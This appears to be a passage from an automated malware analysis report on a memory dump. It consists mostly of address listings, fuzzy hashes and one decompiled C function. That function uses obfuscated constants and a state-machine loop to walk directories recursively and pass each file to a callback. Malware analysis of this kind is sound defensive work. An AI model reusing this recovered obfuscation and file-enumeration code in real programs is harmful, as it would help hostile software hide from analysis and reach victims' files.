                                                                                                                                                                                                                    0x00a7c390
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c398
                                                                                                                                                                                                                    0x00a7c18b
                                                                                                                                                                                                                    0x00a7c191
                                                                                                                                                                                                                    0x00a7c291
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c197
                                                                                                                                                                                                                    0x00a7c197
                                                                                                                                                                                                                    0x00a7c199
                                                                                                                                                                                                                    0x00a7c1f2
                                                                                                                                                                                                                    0x00a7c1f7
                                                                                                                                                                                                                    0x00a7c201
                                                                                                                                                                                                                    0x00a7c216
                                                                                                                                                                                                                    0x00a7c21d
                                                                                                                                                                                                                    0x00a7c27c
                                                                                                                                                                                                                    0x00a7c27f
                                                                                                                                                                                                                    0x00a7c284
                                                                                                                                                                                                                    0x00a7c287
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c19b
                                                                                                                                                                                                                    0x00a7c19b
                                                                                                                                                                                                                    0x00a7c1a1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c1a7
                                                                                                                                                                                                                    0x00a7c1b6
                                                                                                                                                                                                                    0x00a7c1b7
                                                                                                                                                                                                                    0x00a7c1b8
                                                                                                                                                                                                                    0x00a7c1bc
                                                                                                                                                                                                                    0x00a7c1c9
                                                                                                                                                                                                                    0x00a7c1e0
                                                                                                                                                                                                                    0x00a7c1e5
                                                                                                                                                                                                                    0x00a7c1e8
                                                                                                                                                                                                                    0x00a7c031
                                                                                                                                                                                                                    0x00a7c031
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c031
                                                                                                                                                                                                                    0x00a7c1a1
                                                                                                                                                                                                                    0x00a7c199
                                                                                                                                                                                                                    0x00a7c191
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c179
                                                                                                                                                                                                                    0x00a7bf8d
                                                                                                                                                                                                                    0x00a7c0e5
                                                                                                                                                                                                                    0x00a7c0fa
                                                                                                                                                                                                                    0x00a7c0fb
                                                                                                                                                                                                                    0x00a7c0fc
                                                                                                                                                                                                                    0x00a7c0fe
                                                                                                                                                                                                                    0x00a7c100
                                                                                                                                                                                                                    0x00a7c106
                                                                                                                                                                                                                    0x00a7c108
                                                                                                                                                                                                                    0x00a7c10b
                                                                                                                                                                                                                    0x00a7c112
                                                                                                                                                                                                                    0x00a7c114
                                                                                                                                                                                                                    0x00a7c116
                                                                                                                                                                                                                    0x00a7c118
                                                                                                                                                                                                                    0x00a7c121
                                                                                                                                                                                                                    0x00a7c121
                                                                                                                                                                                                                    0x00a7c123
                                                                                                                                                                                                                    0x00a7c125
                                                                                                                                                                                                                    0x00a7c127
                                                                                                                                                                                                                    0x00a7c12a
                                                                                                                                                                                                                    0x00a7c12a
                                                                                                                                                                                                                    0x00a7c12a
                                                                                                                                                                                                                    0x00a7c13c
                                                                                                                                                                                                                    0x00a7c13d
                                                                                                                                                                                                                    0x00a7c13e
                                                                                                                                                                                                                    0x00a7c142
                                                                                                                                                                                                                    0x00a7c14f
                                                                                                                                                                                                                    0x00a7c161
                                                                                                                                                                                                                    0x00a7c166
                                                                                                                                                                                                                    0x00a7c169
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c169
                                                                                                                                                                                                                    0x00a7bf99
                                                                                                                                                                                                                    0x00a7c0af
                                                                                                                                                                                                                    0x00a7c0c6
                                                                                                                                                                                                                    0x00a7c0cd
                                                                                                                                                                                                                    0x00a7c0cf
                                                                                                                                                                                                                    0x00a7c0d5
                                                                                                                                                                                                                    0x00a7c0d9
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c0d9
                                                                                                                                                                                                                    0x00a7bfa5
                                                                                                                                                                                                                    0x00a7c076
                                                                                                                                                                                                                    0x00a7c077
                                                                                                                                                                                                                    0x00a7c078
                                                                                                                                                                                                                    0x00a7c07c
                                                                                                                                                                                                                    0x00a7c086
                                                                                                                                                                                                                    0x00a7c0a0
                                                                                                                                                                                                                    0x00a7c0a5
                                                                                                                                                                                                                    0x00a7c0a8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c0a8
                                                                                                                                                                                                                    0x00a7bfb1
                                                                                                                                                                                                                    0x00a7c2f4
                                                                                                                                                                                                                    0x00a7c2f9
                                                                                                                                                                                                                    0x00a7c2fd
                                                                                                                                                                                                                    0x00a7c340
                                                                                                                                                                                                                    0x00a7c35e
                                                                                                                                                                                                                    0x00a7c363
                                                                                                                                                                                                                    0x00a7c36f
                                                                                                                                                                                                                    0x00a7c371
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c371
                                                                                                                                                                                                                    0x00a7bfbd
                                                                                                                                                                                                                    0x00a7bfbf
                                                                                                                                                                                                                    0x00a7bfc5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7bfcb
                                                                                                                                                                                                                    0x00a7bfcb
                                                                                                                                                                                                                    0x00a7bfd4
                                                                                                                                                                                                                    0x00a7bfdb
                                                                                                                                                                                                                    0x00a7bfe3
                                                                                                                                                                                                                    0x00a7bff9
                                                                                                                                                                                                                    0x00a7bffa
                                                                                                                                                                                                                    0x00a7bffb
                                                                                                                                                                                                                    0x00a7bffc
                                                                                                                                                                                                                    0x00a7c00e
                                                                                                                                                                                                                    0x00a7c024
                                                                                                                                                                                                                    0x00a7c029
                                                                                                                                                                                                                    0x00a7c02c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c02c
                                                                                                                                                                                                                    0x00a7bfc5
                                                                                                                                                                                                                    0x00a7c03e
                                                                                                                                                                                                                    0x00a7c04b
                                                                                                                                                                                                                    0x00a7c050
                                                                                                                                                                                                                    0x00a7c058
                                                                                                                                                                                                                    0x00a7c05a
                                                                                                                                                                                                                    0x00a7c060
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c060
                                                                                                                                                                                                                    0x00a7c2f3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c2d6
                                                                                                                                                                                                                    0x00a7c2d6
                                                                                                                                                                                                                    0x00a7c2d6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c2e2

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: h8$jg$oGf$8$I]:
                                                                                                                                                                                                                    • API String ID: 0-1699677323
                                                                                                                                                                                                                    • Opcode ID: 0ad05988902e4ac57794ac5abbacc786d1ea3e0c092ddd34f4d662ca6df74fd6
                                                                                                                                                                                                                    • Instruction ID: 61869d5137f82c623ab3efc0adfb0206c6c8ff89cacfa6c9ea6457f8983a16dc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ad05988902e4ac57794ac5abbacc786d1ea3e0c092ddd34f4d662ca6df74fd6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2620F715083818BD378CF25C98AB8FBBE1BBD4758F108A1DE5CA96260D7B18949CF53
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                                    			E00A79209(void* __ecx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				intOrPtr _v140;
                                                                                                                                                                                                                    				char _v180;
                                                                                                                                                                                                                    				short _v728;
                                                                                                                                                                                                                    				short _v730;
                                                                                                                                                                                                                    				char _v732;
                                                                                                                                                                                                                    				signed int _v776;
                                                                                                                                                                                                                    				char _v1296;
                                                                                                                                                                                                                    				char _v1816;
                                                                                                                                                                                                                    				void* __edx;
                                                                                                                                                                                                                    				void* _t311;
                                                                                                                                                                                                                    				signed int _t347;
                                                                                                                                                                                                                    				void* _t348;
                                                                                                                                                                                                                    				signed int _t351;
                                                                                                                                                                                                                    				intOrPtr _t359;
                                                                                                                                                                                                                    				void* _t361;
                                                                                                                                                                                                                    				signed int _t367;
                                                                                                                                                                                                                    				void* _t404;
                                                                                                                                                                                                                    				signed int _t416;
                                                                                                                                                                                                                    				signed int _t417;
                                                                                                                                                                                                                    				signed int _t418;
                                                                                                                                                                                                                    				signed int _t419;
                                                                                                                                                                                                                    				signed int _t420;
                                                                                                                                                                                                                    				signed int _t421;
                                                                                                                                                                                                                    				signed int _t422;
                                                                                                                                                                                                                    				signed int _t423;
                                                                                                                                                                                                                    				void* _t426;
                                                                                                                                                                                                                    				void* _t427;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t359 = _a8;
                                                                                                                                                                                                                    				_push(_a20);
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_t359);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t311);
                                                                                                                                                                                                                    				_v76 = 0xc84d01;
                                                                                                                                                                                                                    				_t427 = _t426 + 0x1c;
                                                                                                                                                                                                                    				_t361 = 0x7c09893;
                                                                                                                                                                                                                    				_t416 = 0x64;
                                                                                                                                                                                                                    				_v76 = _v76 / _t416;
                                                                                                                                                                                                                    				_t417 = 0x17;
                                                                                                                                                                                                                    				_v76 = _v76 / _t417;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x0000165b;
                                                                                                                                                                                                                    				_v48 = 0x31519b;
                                                                                                                                                                                                                    				_t418 = 0x4e;
                                                                                                                                                                                                                    				_v48 = _v48 * 0x37;
                                                                                                                                                                                                                    				_v48 = _v48 >> 0xd;
                                                                                                                                                                                                                    				_v48 = _v48 | 0x61c26a30;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x61c6e261;
                                                                                                                                                                                                                    				_v68 = 0x53e570;
                                                                                                                                                                                                                    				_v68 = _v68 >> 3;
                                                                                                                                                                                                                    				_v68 = _v68 / _t418;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x000d0542;
                                                                                                                                                                                                                    				_v96 = 0x1a8304;
                                                                                                                                                                                                                    				_v96 = _v96 + 0xffff4f36;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x0011738c;
                                                                                                                                                                                                                    				_v16 = 0x1820d1;
                                                                                                                                                                                                                    				_v16 = _v16 * 0x31;
                                                                                                                                                                                                                    				_v16 = _v16 >> 0xc;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffffd914;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x00091e72;
                                                                                                                                                                                                                    				_v84 = 0x956e6e;
                                                                                                                                                                                                                    				_v84 = _v84 >> 6;
                                                                                                                                                                                                                    				_v84 = _v84 << 7;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x012aa625;
                                                                                                                                                                                                                    				_v24 = 0x6753aa;
                                                                                                                                                                                                                    				_v24 = _v24 + 0xffff0fd0;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x57b0017b;
                                                                                                                                                                                                                    				_v24 = _v24 * 0x14;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0xdcb9258e;
                                                                                                                                                                                                                    				_v64 = 0x8510eb;
                                                                                                                                                                                                                    				_v64 = _v64 >> 7;
                                                                                                                                                                                                                    				_v64 = _v64 * 0x73;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x00709ec9;
                                                                                                                                                                                                                    				_v32 = 0xde3302;
                                                                                                                                                                                                                    				_v32 = _v32 + 0x8d96;
                                                                                                                                                                                                                    				_v32 = _v32 | 0x6ce6bff7;
                                                                                                                                                                                                                    				_v32 = _v32 * 0x30;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x6fc05036;
                                                                                                                                                                                                                    				_v132 = 0xb4a212;
                                                                                                                                                                                                                    				_v132 = _v132 | 0xf15da11e;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0xf1f2c1b8;
                                                                                                                                                                                                                    				_v40 = 0xe41623;
                                                                                                                                                                                                                    				_v40 = _v40 | 0xdffeee7d;
                                                                                                                                                                                                                    				_v40 = _v40 * 0x50;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xfface9c8;
                                                                                                                                                                                                                    				_v108 = 0x71257f;
                                                                                                                                                                                                                    				_v108 = _v108 + 0x5753;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x007ee764;
                                                                                                                                                                                                                    				_v72 = 0x2a1aaa;
                                                                                                                                                                                                                    				_v72 = _v72 | 0xa29a0e2c;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0xa2bbd141;
                                                                                                                                                                                                                    				_v124 = 0x9b426b;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x6bbb8c12;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x6b277b35;
                                                                                                                                                                                                                    				_v12 = 0xcfed88;
                                                                                                                                                                                                                    				_v12 = _v12 >> 3;
                                                                                                                                                                                                                    				_v12 = _v12 | 0x006ab782;
                                                                                                                                                                                                                    				_v12 = _v12 << 7;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x3dfe3d49;
                                                                                                                                                                                                                    				_v128 = 0xdc732d;
                                                                                                                                                                                                                    				_v128 = _v128 >> 1;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0x00629832;
                                                                                                                                                                                                                    				_v116 = 0x1f499;
                                                                                                                                                                                                                    				_t419 = 0x27;
                                                                                                                                                                                                                    				_v116 = _v116 / _t419;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x0008b2d2;
                                                                                                                                                                                                                    				_v60 = 0x319fb1;
                                                                                                                                                                                                                    				_t420 = 0x3e;
                                                                                                                                                                                                                    				_v60 = _v60 * 0x64;
                                                                                                                                                                                                                    				_v60 = _v60 / _t420;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x0056dc30;
                                                                                                                                                                                                                    				_v28 = 0x23955c;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xffff1ff8;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xfffffb95;
                                                                                                                                                                                                                    				_v28 = _v28 >> 5;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x0001259d;
                                                                                                                                                                                                                    				_v100 = 0xc6b420;
                                                                                                                                                                                                                    				_v100 = _v100 << 2;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x031c3432;
                                                                                                                                                                                                                    				_v20 = 0xbb928a;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xadb7;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffffac57;
                                                                                                                                                                                                                    				_t421 = 0xc;
                                                                                                                                                                                                                    				_v20 = _v20 / _t421;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x0008ad77;
                                                                                                                                                                                                                    				_v80 = 0x708cd7;
                                                                                                                                                                                                                    				_v80 = _v80 * 0x11;
                                                                                                                                                                                                                    				_v80 = _v80 | 0x62417284;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x677aa51b;
                                                                                                                                                                                                                    				_v104 = 0xdb86e2;
                                                                                                                                                                                                                    				_v104 = _v104 + 0xed19;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x00d3c2a6;
                                                                                                                                                                                                                    				_v56 = 0x957bb8;
                                                                                                                                                                                                                    				_v56 = _v56 << 6;
                                                                                                                                                                                                                    				_v56 = _v56 * 0x54;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x43285553;
                                                                                                                                                                                                                    				_v44 = 0xcc5d7e;
                                                                                                                                                                                                                    				_v44 = _v44 + 0xb50b;
                                                                                                                                                                                                                    				_v44 = _v44 + 0xffffbc9e;
                                                                                                                                                                                                                    				_v44 = _v44 + 0x8dbc;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x00ca7778;
                                                                                                                                                                                                                    				_v112 = 0x1013ba;
                                                                                                                                                                                                                    				_v112 = _v112 * 0x64;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0x0649f35b;
                                                                                                                                                                                                                    				_v36 = 0xfe4860;
                                                                                                                                                                                                                    				_v36 = _v36 + 0x8a7e;
                                                                                                                                                                                                                    				_t422 = 0x2f;
                                                                                                                                                                                                                    				_v36 = _v36 / _t422;
                                                                                                                                                                                                                    				_t423 = 0x38;
                                                                                                                                                                                                                    				_v36 = _v36 * 0x55;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x01c480bb;
                                                                                                                                                                                                                    				_v136 = 0x327963;
                                                                                                                                                                                                                    				_v136 = _v136 / _t423;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x0004ddb7;
                                                                                                                                                                                                                    				_v120 = 0xfc2da0;
                                                                                                                                                                                                                    				_v120 = _v120 >> 3;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x001c4cc9;
                                                                                                                                                                                                                    				_v52 = 0xf40dc4;
                                                                                                                                                                                                                    				_v52 = _v52 * 0x48;
                                                                                                                                                                                                                    				_v52 = _v52 | 0x3ff9d6bf;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x7ff6a9e0;
                                                                                                                                                                                                                    				_v88 = 0xc40b66;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x11733536;
                                                                                                                                                                                                                    				_v88 = _v88 * 0x15;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x740ba064;
                                                                                                                                                                                                                    				_v92 = 0x5fbabf;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x34511c07;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x340c16b7;
                                                                                                                                                                                                                    				_t415 = _v92;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t404 = 0x2e;
                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                    					while(_t361 != 0x573bf4e) {
                                                                                                                                                                                                                    						if(_t361 == 0x742005b) {
                                                                                                                                                                                                                    							__eflags = _v776 & _v76;
                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                    								_t347 = _a20( &_v776,  &_v180);
                                                                                                                                                                                                                    								asm("sbb ecx, ecx");
                                                                                                                                                                                                                    								_t367 =  ~_t347 & 0x05a9c6f9;
                                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                                    								_t361 = _t367 + 0x573bf4e;
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									L1:
                                                                                                                                                                                                                    									_t404 = 0x2e;
                                                                                                                                                                                                                    									goto L2;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							__eflags = _v732 - _t404;
                                                                                                                                                                                                                    							if(_v732 != _t404) {
                                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                                    								__eflags = _a4;
                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                    									_push(_v116);
                                                                                                                                                                                                                    									_push(_v128);
                                                                                                                                                                                                                    									_push(_v12);
                                                                                                                                                                                                                    									E00A7E773(_v28, __eflags,  &_v732, _v100, 0xa613c8,  &_v1296, E00A81E60(0xa613c8, _v124, __eflags), _t359, _v20);
                                                                                                                                                                                                                    									E00A79209(_v80, _a4,  &_v1296, _v56, _a16, _a20);
                                                                                                                                                                                                                    									_t427 = _t427 + 0x3c;
                                                                                                                                                                                                                    									_t351 = E00A7D6DF(_v44, _t353, _v112, _v36);
                                                                                                                                                                                                                    									_t404 = 0x2e;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								L19:
                                                                                                                                                                                                                    								_t361 = 0xb1d8647;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							__eflags = _v730;
                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                    								goto L19;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							__eflags = _v730 - _t404;
                                                                                                                                                                                                                    							if(_v730 != _t404) {
                                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							__eflags = _v728;
                                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L19;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t361 == 0x7c09893) {
                                                                                                                                                                                                                    							_v140 = _t359;
                                                                                                                                                                                                                    							_t361 = 0x857628f;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t361 == 0x857628f) {
                                                                                                                                                                                                                    							_push(_v16);
                                                                                                                                                                                                                    							_push(_v96);
                                                                                                                                                                                                                    							_push(_v68);
                                                                                                                                                                                                                    							_t348 = E00A81E60(0xa613b8, _v48, __eflags);
                                                                                                                                                                                                                    							E00A7E97F( &_v1816, __eflags, _v84, _v24, 0xa613b8, _v64, _t359);
                                                                                                                                                                                                                    							_t427 = _t427 + 0x20;
                                                                                                                                                                                                                    							E00A7D6DF(_v32, _t348, _v132, _v40);
                                                                                                                                                                                                                    							_t361 = 0xe766b1a;
                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                    								L1:
                                                                                                                                                                                                                    								_t404 = 0x2e;
                                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t361 == 0xb1d8647) {
                                                                                                                                                                                                                    							_t351 = E00A77CD6(_v136,  &_v776, _v120, _t415);
                                                                                                                                                                                                                    							asm("sbb ecx, ecx");
                                                                                                                                                                                                                    							_t367 =  ~_t351 & 0x01ce410d;
                                                                                                                                                                                                                    							__eflags = _t367;
                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t361 != 0xe766b1a) {
                                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                                    							__eflags = _t361 - 0xe6072de;
                                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                                    							return _t351;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t351 = E00A73917(_v108,  &_v1816,  &_v776, _v72);
                                                                                                                                                                                                                    						_t415 = _t351;
                                                                                                                                                                                                                    						if(_t351 == 0xffffffff) {
                                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t361 = 0x742005b;
                                                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					E00A7EB1B(_t415, _v52, _v88, _v92);
                                                                                                                                                                                                                    					_t361 = 0xe6072de;
                                                                                                                                                                                                                    					_t404 = 0x2e;
                                                                                                                                                                                                                    					goto L24;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}






























































                                                                                                                                                                                                                    0x00a79213
                                                                                                                                                                                                                    0x00a79218
                                                                                                                                                                                                                    0x00a7921b
                                                                                                                                                                                                                    0x00a7921e
                                                                                                                                                                                                                    0x00a79221
                                                                                                                                                                                                                    0x00a79222
                                                                                                                                                                                                                    0x00a79226
                                                                                                                                                                                                                    0x00a79227
                                                                                                                                                                                                                    0x00a7922c
                                                                                                                                                                                                                    0x00a79233
                                                                                                                                                                                                                    0x00a7923b
                                                                                                                                                                                                                    0x00a79242
                                                                                                                                                                                                                    0x00a79247
                                                                                                                                                                                                                    0x00a7924f
                                                                                                                                                                                                                    0x00a79254
                                                                                                                                                                                                                    0x00a79259
                                                                                                                                                                                                                    0x00a79260
                                                                                                                                                                                                                    0x00a7926b
                                                                                                                                                                                                                    0x00a7926c
                                                                                                                                                                                                                    0x00a7926f
                                                                                                                                                                                                                    0x00a79273
                                                                                                                                                                                                                    0x00a7927a
                                                                                                                                                                                                                    0x00a79281
                                                                                                                                                                                                                    0x00a79288
                                                                                                                                                                                                                    0x00a79291
                                                                                                                                                                                                                    0x00a79294
                                                                                                                                                                                                                    0x00a7929b
                                                                                                                                                                                                                    0x00a792a2
                                                                                                                                                                                                                    0x00a792a9
                                                                                                                                                                                                                    0x00a792b0
                                                                                                                                                                                                                    0x00a792bb
                                                                                                                                                                                                                    0x00a792be
                                                                                                                                                                                                                    0x00a792c2
                                                                                                                                                                                                                    0x00a792c9
                                                                                                                                                                                                                    0x00a792d0
                                                                                                                                                                                                                    0x00a792d7
                                                                                                                                                                                                                    0x00a792db
                                                                                                                                                                                                                    0x00a792df
                                                                                                                                                                                                                    0x00a792e6
                                                                                                                                                                                                                    0x00a792ed
                                                                                                                                                                                                                    0x00a792f4
                                                                                                                                                                                                                    0x00a792ff
                                                                                                                                                                                                                    0x00a79302
                                                                                                                                                                                                                    0x00a79309
                                                                                                                                                                                                                    0x00a79310
                                                                                                                                                                                                                    0x00a79318
                                                                                                                                                                                                                    0x00a7931b
                                                                                                                                                                                                                    0x00a79322
                                                                                                                                                                                                                    0x00a79329
                                                                                                                                                                                                                    0x00a79330
                                                                                                                                                                                                                    0x00a7933b
                                                                                                                                                                                                                    0x00a7933e
                                                                                                                                                                                                                    0x00a79345
                                                                                                                                                                                                                    0x00a7934c
                                                                                                                                                                                                                    0x00a79353
                                                                                                                                                                                                                    0x00a7935a
                                                                                                                                                                                                                    0x00a79361
                                                                                                                                                                                                                    0x00a7936c
                                                                                                                                                                                                                    0x00a7936f
                                                                                                                                                                                                                    0x00a79376
                                                                                                                                                                                                                    0x00a7937f
                                                                                                                                                                                                                    0x00a79386
                                                                                                                                                                                                                    0x00a7938d
                                                                                                                                                                                                                    0x00a79394
                                                                                                                                                                                                                    0x00a793a1
                                                                                                                                                                                                                    0x00a793a8
                                                                                                                                                                                                                    0x00a793af
                                                                                                                                                                                                                    0x00a793b6
                                                                                                                                                                                                                    0x00a793bd
                                                                                                                                                                                                                    0x00a793c4
                                                                                                                                                                                                                    0x00a793c8
                                                                                                                                                                                                                    0x00a793cf
                                                                                                                                                                                                                    0x00a793d3
                                                                                                                                                                                                                    0x00a793da
                                                                                                                                                                                                                    0x00a793e1
                                                                                                                                                                                                                    0x00a793e4
                                                                                                                                                                                                                    0x00a793eb
                                                                                                                                                                                                                    0x00a793f7
                                                                                                                                                                                                                    0x00a793fc
                                                                                                                                                                                                                    0x00a79401
                                                                                                                                                                                                                    0x00a79408
                                                                                                                                                                                                                    0x00a79413
                                                                                                                                                                                                                    0x00a79416
                                                                                                                                                                                                                    0x00a79420
                                                                                                                                                                                                                    0x00a79423
                                                                                                                                                                                                                    0x00a7942a
                                                                                                                                                                                                                    0x00a79431
                                                                                                                                                                                                                    0x00a79438
                                                                                                                                                                                                                    0x00a7943f
                                                                                                                                                                                                                    0x00a79443
                                                                                                                                                                                                                    0x00a7944a
                                                                                                                                                                                                                    0x00a79451
                                                                                                                                                                                                                    0x00a79455
                                                                                                                                                                                                                    0x00a7945c
                                                                                                                                                                                                                    0x00a79463
                                                                                                                                                                                                                    0x00a7946a
                                                                                                                                                                                                                    0x00a79474
                                                                                                                                                                                                                    0x00a79477
                                                                                                                                                                                                                    0x00a7947a
                                                                                                                                                                                                                    0x00a79481
                                                                                                                                                                                                                    0x00a7948c
                                                                                                                                                                                                                    0x00a7948f
                                                                                                                                                                                                                    0x00a79496
                                                                                                                                                                                                                    0x00a7949d
                                                                                                                                                                                                                    0x00a794a4
                                                                                                                                                                                                                    0x00a794ab
                                                                                                                                                                                                                    0x00a794b2
                                                                                                                                                                                                                    0x00a794b9
                                                                                                                                                                                                                    0x00a794c1
                                                                                                                                                                                                                    0x00a794c4
                                                                                                                                                                                                                    0x00a794cb
                                                                                                                                                                                                                    0x00a794d2
                                                                                                                                                                                                                    0x00a794d9
                                                                                                                                                                                                                    0x00a794e0
                                                                                                                                                                                                                    0x00a794e7
                                                                                                                                                                                                                    0x00a794ee
                                                                                                                                                                                                                    0x00a794f9
                                                                                                                                                                                                                    0x00a794fc
                                                                                                                                                                                                                    0x00a79503
                                                                                                                                                                                                                    0x00a7950a
